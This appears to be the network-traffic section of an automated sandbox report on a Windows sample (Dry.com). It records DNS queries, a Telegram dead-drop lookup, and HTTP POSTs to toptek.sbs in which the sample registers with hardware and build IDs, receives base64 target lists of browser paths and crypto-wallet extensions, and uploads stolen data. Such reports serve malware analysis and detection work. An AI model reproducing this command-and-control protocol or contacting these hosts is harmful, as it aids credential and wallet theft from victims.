                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159662008 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159724951 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159724951 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159774065 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159825087 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159830093 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.159883976 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.160084963 CET49785443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.160115957 CET4434978594.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162600040 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162646055 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162717104 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162909985 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:04.162926912 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.563497066 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.563568115 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.570411921 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.570451021 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.572087049 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:05.572099924 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471395016 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471498013 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471561909 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471600056 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471623898 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471654892 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471765995 CET49791443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:06.471797943 CET4434979194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:22:08.944310904 CET4434977994.130.188.57192.168.2.4
Dec 23, 2024 06:22:08.944367886 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:08.944396973 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:08.944449902 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:08.945188999 CET | 49779 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:08.945230007 CET | 443 | 49779 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:09.569964886 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:09.570002079 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:09.570065022 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:09.570301056 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:09.570312977 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.973120928 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.973283052 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.973674059 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.973681927 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.975970030 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.975975037 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.976070881 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.976082087 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.976172924 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.976186037 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.976309061 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.976361036 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.976460934 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.976470947 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:10.976475000 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:10.976479053 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:12.719645023 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:12.719748974 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.719783068 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:12.719829082 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.719834089 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:12.719887018 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.719958067 CET | 49807 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.719974995 CET | 443 | 49807 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:12.760236979 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.760297060 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:12.760389090 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.760637999 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:12.760656118 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:14.167280912 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:14.167424917 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:14.172054052 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:14.172063112 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:14.174309969 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:14.174314976 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:15.075587034 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:15.075664043 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.075696945 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:15.075717926 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:15.075773954 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.076019049 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.076019049 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.077719927 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.077771902 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:15.077861071 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.078196049 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.078212023 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:15.388746977 CET | 49813 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:15.388783932 CET | 443 | 49813 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:16.477051973 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:16.477154970 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:16.477891922 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:16.477905989 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:16.480424881 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:16.480443954 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:17.384578943 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:17.384680033 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Dec 23, 2024 06:22:17.384702921 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:17.384743929 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:17.385082006 CET | 49819 | 443 | 192.168.2.4 | 94.130.188.57
Dec 23, 2024 06:22:17.385101080 CET | 443 | 49819 | 94.130.188.57 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 06:21:01.930978060 CET | 49888 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 06:21:02.187187910 CET | 53 | 49888 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:17.137743950 CET | 58263 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 06:21:17.275702000 CET | 53 | 58263 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:19.222131968 CET | 58898 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 06:21:19.633975983 CET | 53 | 58898 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:20.911536932 CET | 138 | 138 | 192.168.2.4 | 192.168.2.255
Dec 23, 2024 06:21:35.688081026 CET | 53 | 49572 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:35.721637964 CET | 53 | 63928 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:35.790251970 CET | 59586 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 06:21:35.790517092 CET | 54623 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 06:21:35.926732063 CET | 53 | 59586 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:35.927246094 CET | 53 | 54623 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:38.494040966 CET | 53 | 56609 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 06:21:40.305870056 CET | 53 | 61820 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 06:21:01.930978060 CET | 192.168.2.4 | 1.1.1.1 | 0x3d70 | Standard query (0) | bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:17.137743950 CET | 192.168.2.4 | 1.1.1.1 | 0x14d6 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:19.222131968 CET | 192.168.2.4 | 1.1.1.1 | 0x5cc6 | Standard query (0) | toptek.sbs | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:35.790251970 CET | 192.168.2.4 | 1.1.1.1 | 0x7568 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:35.790517092 CET | 192.168.2.4 | 1.1.1.1 | 0x81c | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 06:21:02.187187910 CET | 1.1.1.1 | 192.168.2.4 | 0x3d70 | Name error (3) | bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:17.275702000 CET | 1.1.1.1 | 192.168.2.4 | 0x14d6 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:19.633975983 CET | 1.1.1.1 | 192.168.2.4 | 0x5cc6 | No error (0) | toptek.sbs | | 94.130.188.57 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:35.926732063 CET | 1.1.1.1 | 192.168.2.4 | 0x7568 | No error (0) | www.google.com | | 142.250.181.132 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 06:21:35.927246094 CET | 1.1.1.1 | 192.168.2.4 | 0x81c | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
• t.me
• toptek.sbs
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 149.154.167.99 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:18 UTC | 85 | OUT
    GET /k04ael HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:21:19 UTC | 512 | IN
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 23 Dec 2024 05:21:18 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12295
    Connection: close
    Set-Cookie: stel_ssid=ff4c4c8b33065ec21d_13460331070396189714; expires=Tue, 24 Dec 2024 05:21:18 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
2024-12-23 05:21:19 UTC | 12295 | IN
    Data Ascii:
    <!DOCTYPE html>
    <html>
      <head>
        <meta charset="utf-8">
        <title>Telegram: Contact @k04ael</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:21 UTC | 230 | OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:21:22 UTC | 158 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 05:21:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-23 05:21:22 UTC | 5 | IN
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:23 UTC | 322 | OUT
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----T0ZUSR1VAI58QQI5XT2D
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 255
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:21:23 UTC | 255 | OUT
    Data Ascii:
    ------T0ZUSR1VAI58QQI5XT2D
    Content-Disposition: form-data; name="hwid"

    0C5414A1F09A291931458-a33c7340-61ca
    ------T0ZUSR1VAI58QQI5XT2D
    Content-Disposition: form-data; name="build_id"

    dadb5e51ebe3ba12afb7fbe624d12a2b
    ------T0ZUSR1VAI58QQI5XT2D--
2024-12-23 05:21:24 UTC | 158 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 05:21:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-23 05:21:24 UTC | 70 | IN
    Data Raw: 33 62 0d 0a 31 7c 31 7c 31 7c 30 7c 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 7c 31 7c 31 7c 30 7c 31 7c 30 7c 31 30 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
    Data Ascii:
    3b
    1|1|1|0|a66c99b4ea1107d67781e132b296cd32|1|1|0|1|0|100000|1
    0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:26 UTC | 322 | OUT
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BSRIEKXT2VAIEUSR9RQ9
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:21:26 UTC | 331 | OUT
    Data Ascii:
    ------BSRIEKXT2VAIEUSR9RQ9
    Content-Disposition: form-data; name="token"

    a66c99b4ea1107d67781e132b296cd32
    ------BSRIEKXT2VAIEUSR9RQ9
    Content-Disposition: form-data; name="build_id"

    dadb5e51ebe3ba12afb7fbe624d12a2b
    ------BSRIEKXT2VAIEUSR9RQ9
    Cont
2024-12-23 05:21:26 UTC | 158 | IN
    HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 05:21:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-23 05:21:26 UTC | 2192 | IN
    Data Ascii:
    884
    R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49745 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:28 UTC | 322 | OUT
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----OP8QIECJ5XBIM7Y5XBAI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:21:28 UTC | 331 | OUT
    Data Ascii:
    ------OP8QIECJ5XBIM7Y5XBAI
    Content-Disposition: form-data; name="token"

    a66c99b4ea1107d67781e132b296cd32
    ------OP8QIECJ5XBIM7Y5XBAI
    Content-Disposition: form-data; name="build_id"

    dadb5e51ebe3ba12afb7fbe624d12a2b
    ------OP8QIECJ5XBIM7Y5XBAI
    Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:29 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:29 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                  Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID 5 | Source 192.168.2.4:49746 | Destination 94.130.188.57:443 | PID 7548 | Process C:\Users\user\AppData\Local\Temp\245347\Dry.com

2024-12-23 05:21:30 UTC | 322 bytes | OUT
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----0R9H4EU37QIMYMGVKXT2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache

2024-12-23 05:21:30 UTC | 332 bytes | OUT
Data Raw: 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 47 56 4b 58 54 32 0d 0a 43 6f 6e 74
Data Ascii (multipart body, CRLF line breaks restored from the hex; the dump is truncated by the report after "Cont"):
------0R9H4EU37QIMYMGVKXT2
Content-Disposition: form-data; name="token"

a66c99b4ea1107d67781e132b296cd32
------0R9H4EU37QIMYMGVKXT2
Content-Disposition: form-data; name="build_id"

dadb5e51ebe3ba12afb7fbe624d12a2b
------0R9H4EU37QIMYMGVKXT2
Cont

2024-12-23 05:21:31 UTC | 158 bytes | IN
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2024-12-23 05:21:31 UTC | 119 bytes | IN
Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
Data Ascii (one chunk of size 0x6c = 108 bytes holding a base64 string, then the terminating 0 chunk; the base64 decodes to MetaMask|1|webextension@metamask.io|Ronin Wallet|1|ronin-wallet@axieinfinity.com|, i.e. wallet extension names with their Firefox add-on IDs):
6c
TWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
0


Session ID 6 | Source 192.168.2.4:49747 | Destination 94.130.188.57:443 | PID 7548 | Process C:\Users\user\AppData\Local\Temp\245347\Dry.com

2024-12-23 05:21:33 UTC | 323 bytes | OUT
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5XL6XTRI58QIEKFKFCT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 7085
Connection: Keep-Alive
Cache-Control: no-cache

2024-12-23 05:21:33 UTC | 7085 bytes | OUT
Data Raw: 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74
Data Ascii (multipart body, CRLF line breaks restored from the hex; the dump is truncated by the report after "Cont"):
------Z5XL6XTRI58QIEKFKFCT
Content-Disposition: form-data; name="token"

a66c99b4ea1107d67781e132b296cd32
------Z5XL6XTRI58QIEKFKFCT
Content-Disposition: form-data; name="build_id"

dadb5e51ebe3ba12afb7fbe624d12a2b
------Z5XL6XTRI58QIEKFKFCT
Cont

2024-12-23 05:21:34 UTC | 158 bytes | IN
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

2024-12-23 05:21:34 UTC | 12 bytes | IN
Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii (chunked body: a 2-byte chunk "ok" followed by the terminating 0 chunk):
2
ok
0


Session ID 7 | Source 192.168.2.4:49748 | Destination 94.130.188.57:443 | PID 7548 | Process C:\Users\user\AppData\Local\Temp\245347\Dry.com

2024-12-23 05:21:34 UTC | 322 bytes | OUT
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5XL6XTRI58QIEKFKFCT
